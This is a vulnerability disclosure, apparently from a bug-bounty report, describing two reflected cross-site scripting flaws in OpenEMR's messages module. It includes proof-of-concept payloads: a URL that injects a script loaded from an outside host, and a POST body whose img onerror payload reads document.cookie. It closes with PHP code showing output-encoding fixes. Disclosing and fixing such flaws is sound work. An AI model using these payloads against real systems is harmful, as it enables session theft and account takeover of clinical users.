Multiple Reflected Cross-Site Scripting in Messages Module in openemr/openemr
Reported on
Oct 6th 2022
Description
The first occurrence affects the messages.php file. The stage parameter was not properly encoded before being printed as HTML. This occurs when the go parameter is set to the value setup.
The second instance affects the save.php file. A POST parameter called parameter, containing JSON, was being echoed as-is in a JSON response that was served with an HTML Content-Type header.
Proof of Concept
The first instance can be exploited by accessing http://openemr.vuln/interface/main/messages/messages.php?go=setup&stage=%3Cscript%20src=//xt.rs%3E%3C/script%3E.
The following HTML code will be generated:
369: <title>MedEx Setup</title><br /><span class='title'><script src=//xt.rs></script> Warning: This is not a valid request.</span></body>
The second instance can be exploited by sending the following request:
POST /openemr/interface/main/messages/save.php?action=process HTTP/1.1
Host: xxxxxxx
(...snip..)
parameter={"xss":"<img%20src=x%20onerror=alert(document.cookie)>"}
That request generated this response:
HTTP/1.1 200 OK
(...snip...)
Content-Type: text/html; charset=utf-8
{"xss":"<img src=x onerror=alert(document.cookie)>"}
Because the response is served with an HTML content type, the browser renders the body as HTML and the payload is executed.
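Both findings are output-encoding defects: a user-controlled value reaches an HTML page unencoded, and a JSON body is emitted with the wrong content type. The following PHP is an added example, not OpenEMR's own code, showing the two fixes the report implies: HTML-encoding the stage value at the point of output, and returning the parameter data as properly encoded JSON under a JSON Content-Type. The function names, the response array shape and the sample inputs are constructed for illustration.

```php
<?php
// Added example (not OpenEMR's code): stand-alone helpers for the two
// output-encoding fixes this report calls for. Function names, the
// response array shape and the inputs below are illustrative assumptions.

declare(strict_types=1);

/**
 * First instance: a value that ends up inside an HTML document must be
 * HTML-encoded when it is output. ENT_QUOTES also encodes ' and ", so the
 * value is inert inside attribute values as well as text nodes.
 */
function renderSetupWarning(string $stage): string
{
    $safe = htmlspecialchars($stage, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<span class='title'>" . $safe . " Warning: This is not a valid request.</span>";
}

/**
 * Second instance: a JSON reply must carry a JSON content type and be
 * produced by json_encode, never by echoing the request body back.
 * The JSON_HEX_* flags turn < > & ' " into \uXXXX escapes, so the body
 * stays inert even if a client or proxy mislabels it as HTML; nosniff stops
 * browsers from second-guessing the declared type.
 * A real handler would emit these headers with header(); returning them
 * here keeps the function easy to inspect and test.
 */
function buildJsonResponse(array $data): array
{
    $body = json_encode(
        $data,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return [
        'headers' => [
            'Content-Type' => 'application/json; charset=utf-8',
            'X-Content-Type-Options' => 'nosniff',
        ],
        'body' => $body,
    ];
}

/**
 * Parse the incoming "parameter" field as JSON instead of trusting it as
 * text. Returns null when the field is missing or is not a JSON object, so
 * the caller can answer with a structured error rather than echoing input.
 */
function parseParameterField(?string $raw): ?array
{
    if ($raw === null) {
        return null;
    }
    try {
        $decoded = json_decode($raw, true, 16, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;
    }
    return is_array($decoded) ? $decoded : null;
}

// Demonstration with constructed inputs shaped like the report's payloads.
if (PHP_SAPI === 'cli') {
    $stage = '<script src=//example.invalid></script>';
    echo renderSetupWarning($stage), PHP_EOL;

    $decoded = parseParameterField('{"xss":"<img src=x onerror=alert(1)>"}');
    $resp = buildJsonResponse($decoded ?? ['error' => 'invalid parameter']);
    foreach ($resp['headers'] as $name => $value) {
        echo "$name: $value", PHP_EOL;
    }
    echo $resp['body'], PHP_EOL;
}
```

Run it with `php example.php` to see the encoded span and the JSON body whose angle brackets have become `\u003C` / `\u003E` escapes. The two changes are independent: the HTML encoding alone fixes the first instance, while the correct Content-Type alone would already stop the second one from rendering as markup; the JSON_HEX_* flags are defence in depth for the case where the type header is lost downstream.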
Impact
This vulnerability allows a remote attacker to gain control of the victim's browser when a malicious link is clicked. The attacker could steal the session cookie, trick the user into entering their credentials or, in general, take control of the web application flow.